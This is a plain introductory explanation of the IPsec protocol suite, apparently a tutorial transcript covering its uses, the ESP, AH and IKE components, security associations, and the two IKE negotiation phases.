IP security (IPSec)
The IP security (IPSec) is an Internet Engineering
Task Force (IETF) standard suite of protocols
between 2 communication points across the
IP network that provide data authentication,
integrity, and confidentiality.
It also defines the encrypted, decrypted and
authenticated packets.
The protocols needed for secure key exchange
and key management are defined in it.
Uses of IP Security –
IPsec can be used to do the following things:
To encrypt application layer data.
To provide security for routers sending routing
data across the public internet.
To provide authentication without encryption,
like to authenticate that the data originates
from a known sender.
To protect network data by setting up circuits
using IPsec tunneling in which all data is
being sent between the two endpoints is encrypted,
as with a Virtual Private Network(VPN) connection.
Components of IP Security –
It has the following components:
Encapsulating Security Payload (ESP) –
It provides data integrity, encryption, authentication
and anti-replay.
It also provides authentication for payload.
Authentication Header (AH) –
It also provides data integrity, authentication
and anti-replay and it does not provide encryption.
The anti-replay protection protects against
unauthorized transmission of packets.
It does not protect the data’s confidentiality.
Internet Key Exchange (IKE) –
It is a network security protocol designed
to dynamically exchange encryption keys and
find a way over Security Association (SA)
between 2 devices.
The Security Association (SA) establishes
shared security attributes between 2 network
entities to support secure communication.
The Key Management Protocol (ISAKMP) and Internet
Security Association which provides a framework
for authentication and key exchange.
ISAKMP tells how the set up of the Security
Associations (SAs) and how direct connections
between two hosts that are using IPsec.
Internet Key Exchange (IKE) provides message
content protection and also an open frame
for implementing standard algorithms such
as SHA and MD5.
The algorithm’s IP sec users produce a unique
identifier for each packet.
This identifier then allows a device to determine
whether a packet has been correct or not.
Packets which are not authorized are discarded
and not given to the receiver.
Working of IP Security –
The host checks if the packet should be transmitted
using IPsec or not.
This packet traffic triggers the security
policy for themselves.
This is done when the system sending the packet
apply appropriate encryption.
The incoming packets are also checked by the
host that they are encrypted properly or not.
Then the IKE Phase 1 starts in which the 2
hosts( using IPsec ) authenticate themselves
to each other to start a secure channel.
It has 2 modes.
The Main mode which provides the greater security
and the Aggressive mode which enables the
host to establish an IPsec circuit more quickly.
The channel created in the last step is then
used to securely negotiate the way the IP
circuit will encrypt data accross the IP circuit.
Now, the IKE Phase 2 is conducted over the
secure channel in which the two hosts negotiate
the type of cryptographic algorithms to use
on the session and agreeing on secret keying
material to be used with those algorithms.
Then the data is exchanged accross the newly
created IPsec encrypted tunnel.
These packets are encrypted and decrypted
by the hosts using IPsec SAs.
When the communacation between the hosts is
completed or the session times out then the
IPsec tunnel is terminated by discarding the
keys by both the hosts.
